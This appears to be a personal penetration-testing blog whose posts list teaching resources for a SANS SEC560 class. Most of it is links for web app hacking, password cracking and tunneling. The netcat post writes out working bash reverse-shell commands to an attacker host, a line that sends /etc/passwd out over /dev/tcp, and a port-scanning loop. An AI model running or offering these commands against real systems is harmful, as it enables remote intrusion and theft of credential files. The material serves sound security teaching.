Sunday, August 5, 2012

Resurrection

I'm thinking of resurrecting this blog. I've been sitting on it a bit and posting elsewhere, but I think this might be an opportune time to dust it off and add some content.

So, first off, if you are looking for the patches or the slides from 'The Safety Dance: Wardriving the 4.9ghz Public Safety Band, they can be found on Github here: https://github.com/OpenSecurityResearch/public-safety

I think we're going to keep poking at it a bit as there may be a few more interesting things to find there. The nice thing about this line of research is it's something you can pull out each time you go to a new city, you never know what kind of cool networks you may find ;)

Secondly, Defcon was really a blast. I think the best part (other than speaking, which was surreal) was meeting the other speakers and having some really cool conversations about each others research. It's humbling to realize how smart some of these guys are, but the truly amazing part is how they treat you as an equal, which I suppose is even more humbling ;)

The other really awesome part was the discussions we had at the Q&A session after the talk. The guys who came to it truly love wireless, and some were wicked talented as well. To the dude who reversed the app for the RFID cards, can you ping me please? I'm trying to figure out which business card is yours and I'm terrible with names. Also, thanks to the other fellow who clued us in on some really useful 4.9ghz infos.

Anyway, check this space for more blathering shortly. With BH/DC being over and me (finally) being home for a little bit, I'm really feeling re-energized and looking forward to new research, so I'll post as much as possible.


Cheers,

RP


Thursday, August 26, 2010

Web application hacking resources

Here's some links I provided to my sec560 students this week for the web application hacking section of the course.

Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.

By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs, all are welcome!

Cheers,

RP


Web application hacking resources


Vulnerable WebApps:

OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary

GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

MOTH - http://www.bonsai-sec.com/en/research/moth.php

Damn Vulnerable Web App - http://www.dvwa.co.uk/

Gruyere - http://google-gruyere.appspot.com/

Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm

Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm

Hackme Shipping -
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm

Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm



Videos & webcasts:

Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx

OWASP Appsec NYC 2008 -http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference

Caught in the web series - http://www.coresecurity.com/content/ondemand-caught

Invasion of the browser snatchers series -http://www.coresecurity.com/content/on-demand-snatchers

Advanced SQL injection -http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection

Websec 101 - http://www.foundstone.com/us/websec101.asp

Hackme Bank & Hackme Travel videos- http://www.foundstone.com/us/resources-videos.asp



Tools

Samurai Web Testing Framework (Live CD which contains most tools needed to perform web assesment) - http://samurai.inguardians.com

Google Hacking Database - http://www.hackersforcharity.org/ghdb/

Burpsuite - http://portswigger.net/suite/

W3AF - http://w3af.sourceforge.net/

Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai

Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi

Wikto - http://www.sensepost.com/labs/tools/pentest/wikto

Sqlmap - http://sqlmap.sourceforge.net/



Methodologies & references

OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf

OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack



Cheat Sheets

SQL Injection Cheat Sheet -http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet

SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/

SQL Injection Cheat Sheets sorted by DB -http://pentestmonkey.net/index.php?option=com_content&task=category§ionid=9&id=24&Itemid=1

XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html

Web App Assesment Cheat Sheet -http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf



Books:

Web Application Hackers Handbook - http://portswigger.net/wahh/

SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240

XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543

The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20



Whitepapers & slides-

Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf

OWASP article on Web application penetration testing -http://www.owasp.org/index.php/Web_Application_Penetration_Testing

Advanced SQL injection -http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf

Best of web application penetration testing tools -http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf

(The next two papers are a little old, but still quite useful)

Advanced SQL Injection in SQL Server -http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

(More) Advanced SQL Injection in SQL server -http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf

Saturday, August 21, 2010

Password cracking resources

Here's a few links to word lists, rainbow tables & other assorted password cracking related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...

Cheers,

RP

http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.

http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.

http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.

http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/

http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.

http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)

http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)

http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)

http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.

Friday, August 13, 2010

/dev/tcp contest

So, I gave my SEC560 mentor class a challenge this week, the student who finds the coolest use for /dev/tcp get's a $10 gift certificate to Starbucks (hey, I'm poor, ok?)

Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.

Good luck & remember "If you're not playing the game, the game is playing you"

Resources on netcat, /dev/tcp, tunneling, etc.

Here's a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic so you'll find some resources in that regard below.

I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.

Enjoy!


Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit

Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html

Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3
- http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html

Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html

Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html



The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html



Netcat variants:

Ncat: http://nmap.org/ncat/

Socat: http://www.dest-unreach.org/socat/

Cryptcat: http://cryptcat.sourceforge.net/info.php

DNScat: http://tadek.pietraszek.org/projects/DNScat/



Also, here are some awesome tunneling & proxying tools


PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies


Stunnel - http://www.stunnel.org/ -

Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL


Proxytunnel - http://proxytunnel.sourceforge.net/

Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.

The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php


ProxyChains - http://proxychains.sourceforge.net/

This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.



BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html



GnuCitizen User Link

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done


Neohapsis User Link

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 0 # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0&0 2>&0



Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:

Linux

• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port

• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener



Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor

/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1

• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered



Linux Command-Line Port Scanner


• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]



Storing Results and Iterating

• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers

$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running

Thursday, July 15, 2010

A few more odds & ends

Still no time for original content, but here a few more resources I sent to my sec560 students, figured I would share them on here as well...


Sec560 week 4 resources:


Here is the free online version of Fyodor's NMAP book, Not all chapters are available, but still a great read - http://nmap.org/book/toc.html


Great tutorial on Scapy:

http://www.secdev.org/projects/scapy/doc/usage.html#interactive-tutorial


Also, a Python tutorial to go with it - http://docs.python.org/tutorial/



Here are two of the papers I mentioned in class:

Exploiting Tomorrow's Internet Today Penetration Testing with IPv6 - http://www.uninformed.org/?v=10&a=3

Insertion, Evasion & Denial of Service, Eluding Network Intrusion Detection - http://insecure.org/stf/secnet_ids/secnet_ids.html



These are some of the blogs I read (or more accurately, try to find time to read)

http://www.darkoperator.com/ - Carlos Perez

http://blog.metasploit.com/ - HD Moore, Egypt & others..

http://taosecurity.blogspot.com/ - Richard Bejtlich

http://www.packetstan.com/ - Judy Novak, Mike Poor, Josh Wright

http://pauldotcom.com/ - Paul Assadorian, Larry Pesce, Carlos Perez, John Strand, Mick Douglas

http://blog.commandlinekungfu.com/ - Ed Skoudis, Hal Pomeranz, Tim Medin

http://carnal0wnage.attackresearch.com/ - Chris Gates, Valsmith & others..

http://vrt-sourcefire.blogspot.com/ - Sourcefire Vulnerability Research Team

http://theharmonyguy.com/ - Joey Tyson

http://blog.harmonysecurity.com/ - Stephen Fewer

http://isc.sans.edu/index.html - SANS Internet Storm Center

Tuesday, July 13, 2010

The end of procrastination (maybe)

I've been trying to get around to start posting on here for a while now, but can never quite come up with what I want to post.

So, I figure I'll just start off with some resources I've been sharing with the students of my sec560 mentor class.

Enjoy & I promise some original content soon (maybe) lol



Resources for sec560 week2:


First off a few Penetration Testing methodologies:


OSSTMM (Open Source Security Testing Methodology Manual) - http://www.isecom.org/osstmm/

Penetration Testing Framework - http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html (Super detailed)

OWASP Testing Guide (focused on web application testing) - http://www.owasp.org/index.php/Category:OWASP_Testing_Project

NIST Guide to Security Testing - http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf


Also, here is a great reference for computer crime related laws: http://www.cybercrime.gov/cclaws.html

One final item, here are a bunch of infosec related 'cheat sheets', the SANS one's pertaining to this course are at the bottom - http://zeltser.com/cheat-sheets/



Resources for sec560 week 3:


Reconnaissance tools & scripts:

Metagoofil: http://www.edge-security.com/metagoofil.php

Metagoofil is an information gathering tool designed for extracting metadata of
public documents (pdf,doc,xls,ppt,odp,ods) availables in the target/victim websites.


The Harvester: http://www.edge-security.com/theHarvester.php

theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains
from different public sources. It's a really simple tool, but very effective.


Subdomainer: http://www.edge-security.com/subdomainer.php

Subdomainer is an information gathering tool designed for obtaining subdomain names from public sources,
like Google, Msn search, Yahoo, PgP servers, etc.


gpscan: http://www.digininja.org/projects/gpscan.php

Scans google profiles for profiles of personnel from a target organization


CeWL: http://www.digininja.org/projects/cewl.php

Custom wordlist generator, scrapes a site & generates a list of words useful for pasword guessing.


Reconnoiter: http://www.jwnetworkconsulting.com/security/web-application-security/new-open-source-project-created-reconnoiter

Generates possible user names by scraping LinkedIn for the names of employees of the target organization



Recommended talks & presentations:

New School Information Gathering - Chris Gates

Audio: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.mp3

Slides: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.pdf


Tactical Exploitation - HD Moore & Valsmith:

Video (part 1): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V35-Moore-Valsmith-Tactical_Exploitation-PT1.mp4

Video (part 2): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V36-Moore-Valsmith-Tactical_Exploitation-PT2.mp4

Whitepaper v1: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf

Whitepaper v2: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf